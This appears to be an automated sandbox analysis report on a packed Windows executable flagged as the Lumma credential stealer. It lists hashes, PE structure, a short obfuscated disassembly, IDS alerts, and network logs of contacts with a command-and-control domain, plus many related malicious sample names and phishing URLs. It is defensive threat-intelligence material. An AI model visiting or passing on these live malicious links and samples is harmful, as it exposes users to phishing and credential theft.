                                                104.21.51.78file.exeGet hashmaliciousLummaCBrowse
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    fp2e7a.wpc.phicdn.nethttp://185.172.128.63/v8sjh3hs8/index.phpGet hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    https://www.mavengroupglobal.uk/DYuPhO4h/v?url=qs6eqSurmcWXoQKf6zcjhg6iePdEghHaDt49dq0x39xgLRd6M1#qs6eqSurmcWXoQKf6zcjhg6iePdEghHaDt49dq0x39xgLRd6M1EFEEZ2FicmllbC5wYXJ2dWxlc2N1QGRldXRzY2hlYmFobi5jb20=Get hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    https://www.canva.com/design/DAGDNh45X_4/PPCLYIV4Y8uUaoEW7ZJrJQ/view?utm_content=DAGDNh45X_4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    R0hb7jyBcv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                    • 192.229.211.108
                                                    https://functional-adhesive-titanium.glitch.me/Get hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    http://findersearching.comGet hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    SecuriteInfo.com.Variant.Ransom.Loki.19527.9895.18577.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 192.229.211.108
                                                    https://www.canva.com/design/DAGDNh45X_4/PPCLYIV4Y8uUaoEW7ZJrJQ/view?utm_content=DAGDNh45X_4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2Get hashmaliciousUnknownBrowse
                                                    • 192.229.211.108
                                                    greetclassifytalk.shopfile.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.177.98
                                                    2llKbb9pR7.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                    • 172.67.177.98
                                                    MdeeRbWvqe.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                    • 172.67.177.98
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.51.78
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.51.78
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUShttps://content.amanet.org/?m=CiGW.81UwlU3LD6ZH5M4ZoUXv03dAeWfC&r=https://control.mailblaze.com/index.php/survey/ps97367sjy584Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    https://www.mavengroupglobal.uk/DYuPhO4h/v?url=qs6eqSurmcWXoQKf6zcjhg6iePdEghHaDt49dq0x39xgLRd6M1#qs6eqSurmcWXoQKf6zcjhg6iePdEghHaDt49dq0x39xgLRd6M1EFEEZ2FicmllbC5wYXJ2dWxlc2N1QGRldXRzY2hlYmFobi5jb20=Get hashmaliciousUnknownBrowse
                                                    • 104.27.195.88
                                                    https://www.canva.com/design/DAGDNh45X_4/PPCLYIV4Y8uUaoEW7ZJrJQ/view?utm_content=DAGDNh45X_4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 104.17.2.184
                                                    http://findersearching.comGet hashmaliciousUnknownBrowse
                                                    • 172.67.169.214
                                                    https://boardmbza.info/fGet hashmaliciousUnknownBrowse
                                                    • 1.1.1.1
                                                    https://www.canva.com/design/DAGDNh45X_4/PPCLYIV4Y8uUaoEW7ZJrJQ/view?utm_content=DAGDNh45X_4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 104.16.103.112
                                                    http://jtmidgett.law/CaptRedr.htmlGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.18.125.91
                                                    https://starmicronics.com/support/download/starprnt-intelligence-software-setup-exe-file-v3-6-0a/#unlockGet hashmaliciousUnknownBrowse
                                                    • 104.16.117.116
                                                    16770075581.zipGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.12.205
                                                    https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    a0e9f5d64349fb13191bc781f81f42e1Iu4csQ2rwX.msiGet hashmaliciousAsyncRATBrowse
                                                    • 104.21.51.78
                                                    o7b91j8vnJ.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.51.78
                                                    SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 104.21.51.78
                                                    file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                    • 104.21.51.78
                                                    https://56hytuti5.weebly.com/Get hashmaliciousUnknownBrowse
                                                    • 104.21.51.78
                                                    udVh4Ist4Z.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 104.21.51.78
                                                    samradapps_datepicker_221114.xlamGet hashmaliciousUnknownBrowse
                                                    • 104.21.51.78
                                                    Enquiry 230424.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 104.21.51.78
                                                    URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 104.21.51.78
                                                    fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 104.21.51.78
                                                    No context
                                                    No created / dropped files found
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.957533593819779
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:file.exe
                                                    File size:5'745'152 bytes
                                                    MD5:c91f9c9ffa73cd9d586d34f73beee0cd
                                                    SHA1:0c6c645322b236944142fdffacbb610906177ee3
                                                    SHA256:1b17680574d595b6211da1ca0664113f78cfb0e678c209dd61664d0f99841942
                                                    SHA512:403eb2e3f09aacbaf06496d8e727d4a1c7d9fbff3b7437e14ab65cd142216189c0eb9d2ddc775f800a678b53ba7948c4704b48cd10de6b04a53d989dbfdc4286
                                                    SSDEEP:98304:Guha6IiuJPovwGz5z0TWmakZv/Rjg3ozLRKdcB4S/BDTRm:nIiullGzOTNa+pjg3on0dwnJD9m
                                                    TLSH:974623232275209AF1E2CC3D853BFDF672F6126E8A83EC7C659A5CC438265F49613953
                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....8#f..............................D...........@..........................@............@.................................0.O....
                                                    Icon Hash:90cececece8e8eb0
                                                    Entrypoint:0x84f01e
                                                    Entrypoint Section:.vmp1
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x662338B6 [Sat Apr 20 03:38:30 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:d435064ba91569f26a23505d954231af
                                                    Instruction
                                                    push DA78F8D9h
                                                    call 00007F0ABC7A0F7Eh
                                                    bswap esi
                                                    inc ecx
                                                    test dh, ch
                                                    inc ecx
                                                    cmp al, 0000000Bh
                                                    push ebx
                                                    neg bx
                                                    xor dword ptr [esp], esi
                                                    pop ebx
                                                    dec ecx
                                                    test esi, 35C6434Eh
                                                    cmc
                                                    dec eax
                                                    arpl si, si
                                                    inc ecx
                                                    test ebx, edi
                                                    inc sp
                                                    cmp ebx, edi
                                                    dec esp
                                                    add eax, esi
                                                    jmp 00007F0ABCC05F7Bh
                                                    mov eax, dword ptr [ebp+00h]
                                                    mov cx, 2DE6h
                                                    stc
                                                    cmp dh, 00000078h
                                                    mov cx, word ptr [ebp+04h]
                                                    lea ebp, dword ptr [ebp+00000006h]
                                                    stc
                                                    test si, 696Eh
                                                    cmp esi, esi
                                                    mov word ptr [eax], cx
                                                    xor cx, 2FEDh
                                                    adc cl, ch
                                                    rol ecx, FFFFFFBAh
                                                    lea esi, dword ptr [esi-00000004h]
                                                    cmp ebp, 1CC81D4Dh
                                                    bts ecx, eax
                                                    rcr cl, cl
                                                    mov ecx, dword ptr [esi]
                                                    clc
                                                    xor ecx, ebx
                                                    ror ecx, 02h
                                                    jmp 00007F0ABC8B8427h
                                                    sysenter
                                                    push 9D50F6B0h
                                                    call 00007F0ABC8A39C0h
                                                    jmp 00007F0ABCC3ECF3h
                                                    dec edx
                                                    cmc
                                                    not edx
                                                    cmc
                                                    clc
                                                    rol edx, 1
                                                    cmp cx, si
                                                    neg edx
                                                    test edi, eax
                                                    jmp 00007F0ABCCBBA7Dh
                                                    jne 00007F0ABC7D7940h
                                                    mov eax, dword ptr [ebp+00h]
                                                    jmp 00007F0ABC8B13C1h
                                                    mov edx, dword ptr [ebp+00h]
                                                    mov cl, byte ptr [ebp+04h]
                                                    test dl, FFFFFF80h
                                                    stc
                                                    sub ebp, 00000002h
                                                    shl edx, cl
                                                    cmovnle ecx, edi
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4f9b300xdc.vmp1
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x8f30000x5bc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x3960000x80.vmp1
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x391050x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x3b0000x28fb0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x3e0000xa5340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .vmp00x490000x32f3790x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .vmp10x3790000x579f000x57a000118b68720f6ba0c5afa62a9c9bfccebbunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .reloc0x8f30000x5bc0x6007c28dc7a41b61cce52c073cf5cfaf0efFalse0.51953125data4.1633892646707835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    DLLImport
                                                    KERNEL32.dllExitProcess
                                                    OLEAUT32.dllSysAllocString
                                                    ole32.dllCoCreateInstance
                                                    USER32.dllCloseClipboard
                                                    GDI32.dllBitBlt
                                                    WTSAPI32.dllWTSSendMessageW
                                                    KERNEL32.dllVirtualQuery
                                                    USER32.dllGetProcessWindowStation
                                                    KERNEL32.dllLocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
                                                    USER32.dllGetProcessWindowStation, GetUserObjectInformationW
                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    04/25/24-13:33:01.018564TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49732443192.168.2.4104.21.51.78
                                                    04/25/24-13:33:06.114264TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49737443192.168.2.4104.21.51.78
                                                    04/25/24-13:32:58.942006UDP2052028ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (greetclassifytalk .shop)5644253192.168.2.41.1.1.1
                                                    04/25/24-13:33:01.871434TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49733443192.168.2.4104.21.51.78
                                                    04/25/24-13:33:04.680270TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49736443192.168.2.4104.21.51.78
                                                    04/25/24-13:32:59.247616TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49730443192.168.2.4104.21.51.78
                                                    04/25/24-13:33:02.853848TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49734443192.168.2.4104.21.51.78
                                                    04/25/24-13:33:03.855093TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49735443192.168.2.4104.21.51.78
                                                    04/25/24-13:33:00.026464TCP2052037ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI)49731443192.168.2.4104.21.51.78
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 25, 2024 13:32:59.122523069 CEST49730443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:32:59.122611046 CEST44349730104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:32:59.122694969 CEST49730443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:32:59.247616053 CEST49730443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:32:59.247689009 CEST44349730104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:32:59.486295938 CEST44349730104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:32:59.486620903 CEST49730443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:32:59.488821030 CEST49730443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:32:59.488845110 CEST44349730104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:32:59.489295006 CEST44349730104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:32:59.534889936 CEST49730443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:32:59.554635048 CEST49730443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:32:59.554635048 CEST49730443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:32:59.554780960 CEST44349730104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.015755892 CEST44349730104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.015872002 CEST44349730104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.015965939 CEST49730443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.018657923 CEST49730443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.018680096 CEST44349730104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.026053905 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.026103973 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.026190996 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.026463985 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.026480913 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.262747049 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.262861967 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.264755011 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.264761925 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.265482903 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.267242908 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.267288923 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.267338037 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.797049046 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.797255993 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.797317028 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.797336102 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.797492981 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.797547102 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.797554970 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.797684908 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.797758102 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.797765970 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.797873020 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.797940016 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.797947884 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.798053026 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.798161030 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.798196077 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.798203945 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.798279047 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.798310995 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.798520088 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.798580885 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.798993111 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.799005985 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:00.799021006 CEST49731443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:00.799026012 CEST44349731104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.018023014 CEST49732443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.018048048 CEST44349732104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.018138885 CEST49732443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.018563986 CEST49732443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.018575907 CEST44349732104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.256438017 CEST44349732104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.256612062 CEST49732443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.258501053 CEST49732443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.258507967 CEST44349732104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.258924961 CEST44349732104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.260672092 CEST49732443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.260835886 CEST49732443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.260874033 CEST44349732104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.260940075 CEST49732443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.260948896 CEST44349732104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.783024073 CEST44349732104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.783288956 CEST44349732104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.783360958 CEST49732443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.784147978 CEST49732443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.870944023 CEST49733443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.870970964 CEST44349733104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:01.871059895 CEST49733443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.871433973 CEST49733443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:01.871443987 CEST44349733104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:02.106620073 CEST44349733104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:02.106827021 CEST49733443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:02.108443975 CEST49733443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:02.108452082 CEST44349733104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:02.108786106 CEST44349733104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:02.110449076 CEST49733443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:02.110615015 CEST49733443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:02.110646963 CEST44349733104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:02.618048906 CEST44349733104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:02.618338108 CEST44349733104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:02.618416071 CEST49733443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:02.618490934 CEST49733443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:02.618505001 CEST44349733104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:02.853316069 CEST49734443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:02.853348970 CEST44349734104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:02.853559017 CEST49734443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:02.853847980 CEST49734443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:02.853862047 CEST44349734104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:03.089853048 CEST44349734104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:03.090102911 CEST49734443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:03.091790915 CEST49734443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:03.091816902 CEST44349734104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:03.092803001 CEST44349734104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:03.094485044 CEST49734443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:03.094705105 CEST49734443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:03.094769955 CEST44349734104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:03.094882965 CEST49734443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:03.094898939 CEST44349734104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:03.652002096 CEST44349734104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:03.652293921 CEST44349734104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:03.652333975 CEST49734443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:03.652383089 CEST49734443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:03.854599953 CEST49735443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:03.854633093 CEST44349735104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:03.854747057 CEST49735443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:03.855093002 CEST49735443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:03.855104923 CEST44349735104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.094806910 CEST44349735104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.095029116 CEST49735443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.096179962 CEST49735443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.096185923 CEST44349735104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.096524000 CEST44349735104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.097584963 CEST49735443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.097682953 CEST49735443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.097702026 CEST44349735104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.599586964 CEST44349735104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.599806070 CEST49735443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.679807901 CEST49736443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.679888010 CEST44349736104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.679976940 CEST49736443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.680269957 CEST49736443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.680320978 CEST44349736104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.923499107 CEST44349736104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.923722029 CEST49736443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.924705982 CEST49736443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.924715042 CEST44349736104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.925146103 CEST44349736104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:04.927428007 CEST49736443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.927510023 CEST49736443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:04.927517891 CEST44349736104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:05.426395893 CEST44349736104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:05.426646948 CEST49736443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.113842964 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.113889933 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.113965034 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.114264011 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.114279032 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.352583885 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.352665901 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.354197979 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.354206085 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.355220079 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.356853008 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.358391047 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.358434916 CEST44349737104.21.51.78192.168.2.4
                                                    Apr 25, 2024 13:33:06.358558893 CEST49737443192.168.2.4104.21.51.78
                                                    Apr 25, 2024 13:33:06.358601093 CEST44349737104.21.51.78192.168.2.4
